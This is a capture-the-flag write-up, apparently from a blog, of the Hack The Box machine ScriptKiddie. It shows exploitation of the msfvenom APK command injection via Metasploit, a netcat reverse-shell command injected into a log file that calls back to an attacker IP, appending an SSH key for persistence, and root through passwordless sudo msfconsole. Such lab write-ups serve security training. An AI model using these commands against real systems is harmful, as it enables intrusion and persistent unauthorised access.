Open in app

Sign in

Write

Sign in

Hack The Box — Script Kiddie — Write up

Lovelesh Gangil
5 min readJun 10, 2021

ScriptKiddie is an easy difficulty Linux machine that presents a Metasploit vulnerability (CVE-2020–7384), along with classic attacks such as OS command injection and an insecure passwordless sudo configuration. Initial foothold on the machine is gained by uploading a malicious .apk file from a web interface that calls a vulnerable version of msfvenom to generate downloadable payloads. Once shell is obtained, lateral movement to a second user is performed by injecting commands into a log file which provides unsanitized input to a Bash script that is triggered on file modification. This user is allowed to run msfconsole as root via sudo without supplying a password, resulting in the escalation of privileges.

Enumeration

Nmap

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1249.13 seconds

Nmap shows that OpenSSH is listening to its default port (22). Additionally, a Werkzeug httpd server is listening on port 5000.

HTTP

The web server on port 5000 returns a page called k1d’5 h4ck3r t00l5 , where some attacking activities can be performed.

The nmap section allows us to run a port scan (top 100 ports) on a given IP address. Running nmap on 127.0.0.1 does not provide any additional information (only ports 22 and 5000 are shown):

The sploits section uses the input to search in searchsploit and presents the results:

No vulnerabilities are found on either the nmap or the sploits interface.

The payloads section allows to select an operating system ( windows , linux or android ), to provide a lhost address and (optionally) to upload a template file. By clicking the generate button, our input is passed to msfvenom to generate a payload; on success, a link to a downloadable file is returned:

Foothold

As a quick web search shows, Metasploit Framework <= 6.0.11 is affected by an APK template command injection vulnerability in msfvenom (CVE-2020–7384). Even though it is not possible to deduct the Metasploit version installed on the target system, it’s worth trying to exploit the functionality to upload APK templates and run msfvenom from the web interface. We use the available Metasploit module from msfconsole to generate a malicious APK template file ( LHOST and LPORT options are set to our VPN IP address and listening port respectively):

msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST tun0
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LPORT 7777
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run

We open a netcat listener on the specified LPORT :

nc -lnvp 7777

We upload the msf.apk file and select android as the operating system:

After selecting generate , a reverse shell in the context of the kid user is returning to our listener:

We can write our public key to ~/.ssh/authorized_keys to obtain persistent SSH access:

echo "ssh-rsa [...]" >> ~/.ssh/authorized_keysssh kid@10.10.10.226

The user flag can be found in /home/kid/user.txt .

Lateral Movement

Basic enumeration reveals the existence of another user called pwn . A world-readable scanlosers.sh script is found in pwn ‘s home directory:

find /home/pwn -type f -readable -ls 2>/dev/null

Escalating to user with having higher privileges i.e pwn. While exploring the system, happen to encounter with file named as hackers. What caught my attention about the file was the group owner assigned to file i.e pwn.

So we could be get reverse shell by executing command in the file. Thus command used:

echo “rm -f /tmp/p; mknod /tmp/p p && nc 10.10.14.102 4444 0/tmp/p">>hackers

Before this lets start the listener again on port 4444.

Next, I checked the permissions this user had and realised that it could run MsfConsole as root without a password.

Thus, I ran sudo msfconsole, used the command /bin/bash to open a shell and found the root hash!

Visit My Hack The Box Profile —

https://app.hackthebox.eu/profile/464208

For any queries contact on my twitter and linkedin profiles -

Lovelesh Gangil - Indore, Madhya Pradesh, India | Professional Profile | LinkedIn

View Lovelesh Gangil's professional profile on LinkedIn. LinkedIn is the world's largest business network, helping…

www.linkedin.com

https://twitter.com/loveleshgangil

Script Kiddie
Walkthrough
Writeup
Hackthebox
Htb

--

--

Lovelesh Gangil

Written by Lovelesh Gangil

37 Followers

Offensive Security | Digital Forensics and Incident Response (DFIR) | CAP | GPCSSI '21 | ICSI (CNSS) | CEH (Practical)

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams